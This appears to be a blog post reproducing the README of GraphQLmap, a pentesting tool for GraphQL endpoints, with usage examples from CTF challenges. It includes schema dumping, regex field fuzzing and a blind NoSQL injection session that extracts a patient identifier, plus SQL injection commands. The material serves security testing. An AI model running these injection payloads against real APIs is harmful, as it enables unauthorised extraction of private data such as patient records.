GraphQLmap : A Scripting Engine To Interact With A Graphql Endpoint For Pentesting Purposes

GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes.

Install

$ git clone https://github.com/swisskyrepo/GraphQLmap
$ python graphqlmap.py
_
/ | | | / _ | | | | _ _ _ _ _ _ | |_ | | | | | _ _ _ _ _ _ | | | | ‘/ | '_ | '_ | | | | | | '_ \ / ` | ‘ \ | || | | | (| | |) | | | | || | || | | | | | (| | |) | _|| _,| ./|| ||_________|| || ||_,| ._/
| | | |
|| ||
Author:Swissky Version:1.0
usage: graphqlmap.py [-h] [-u URL] [-v [VERBOSITY]] [–method [METHOD]] [–headers [HEADERS]]
optional arguments:
-h, –help show this help message and exit
-u URL URL to query : example.com/graphql?query={}
-v [VERBOSITY] Enable verbosity
–method [METHOD] HTTP Method to use interact with /graphql endpoint
–headers [HEADERS] HTTP Headers sent to /graphql endpoint
–json Send requests using POST and JSON

Features And Examples

Examples are based on several CTF challenges from HIP2019.

Connect to a graphql endpoint

python3 graphqlmap.py -u https://yourhostname.com/graphql -v –method POST –headers ‘{“Authorization” : “Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXh0Ijoibm8gc2VjcmV0cyBoZXJlID1QIn0.JqqdOesC-R4LtOS9H0y7bIq-M8AGYjK92x4K3hcBA6o”}’

Dump a GraphQL schema

Use dump_new to dump the GraphQL schema, this function will automaticly populate the “autocomplete” with the found fields.

GraphQLmap > dump_new
============= [SCHEMA] ===============
e.g: name[Type]: arg (Type!)
Query
doctor[]: email (String!),
doctors[Doctor]:
patients[Patient]:
patient[]: id (ID!),
allrendezvous[Rendezvous]:
rendezvous[]: id (ID!),
Doctor
id[ID]:
firstName[String]:
lastName[String]:
specialty[String]:
patients[None]:
rendezvous[None]:
email[String]:
password[String]:
[…]

Interact With A GraphQL Endpoint

Write a GraphQL request and execute it.

GraphQLmap > {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admin\”} }”){firstName lastName id}}
{
“data”: {
“doctors”: [
{
“firstName”: “Admin”,
“id”: “5d089c51dcab2d0032fdd08d”,
“lastName”: “Admin”
}
]
}
}

GraphQL Field Fuzzing

Use GRAPHQL_INCREMENT and GRAPHQL_CHARSET to fuzz a parameter.

GraphQLmap > {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”AdmiGRAPHQL_CHARSET\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi!\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi$\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi%\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi(\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi)\”} }”){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi*\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi+\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi,\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi-\”} }”){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi.\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi/\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi0\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi1\”} }”){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi?\”} }”){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admin\”} }”){firstName lastName id}}

NoSQLi Injection

Use BLIND_PLACEHOLDER inside the query for the nosqli function.

GraphQLmap > nosqli
Query > {doctors(options: “{\”\”patients.ssn\”:1}”, search: “{ \”patients.ssn\”: { \”$regex\”: \”^BLIND_PLACEHOLDER\”}, \”lastName\”:\”Admin\” , \”firstName\”:\”Admin\” }”){id, firstName}}
Check > 5d089c51dcab2d0032fdd08d
Charset > 0123456789abcdef-
[+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b
GraphQLmap >

SQL Injection

GraphQLmap > postgresqli
GraphQLmap > mysqli
GraphQLmap > mssqli

Download
R K

Share
Published by
R K
Tags: GraphQLGraphQLmappentestscripting engine
5 years ago

Recent Posts

Admin Panel Dorks : A Complete List of Google Dorks

Introduction Google Dorking is a technique where advanced search operators are used to uncover information…

13 hours ago

Best Linux Distros in 2026

Linux is renowned for its versatility, open-source nature, and security. Whether you're a beginner, developer,…

14 hours ago

Top 10 Cyber Insurance Companies in 2026

Cyber insurance helps businesses and individuals mitigate financial losses from data breaches, ransomware, extortion, legal…

14 hours ago

Ransomware Incident Response

Ransomware is one of the most dangerous and destructive forms of cybercrime today. With cybercriminals…

16 hours ago

Best Social Media Search Engines and Tools for 2026

Social media is a key part of our daily lives, with millions of users sharing…

18 hours ago

How to Remove Your Personal Information from Data Broker Websites (2026 Guide)

What Are Data Brokers? Data brokers are companies that collect, aggregate, and sell personal information,…

18 hours ago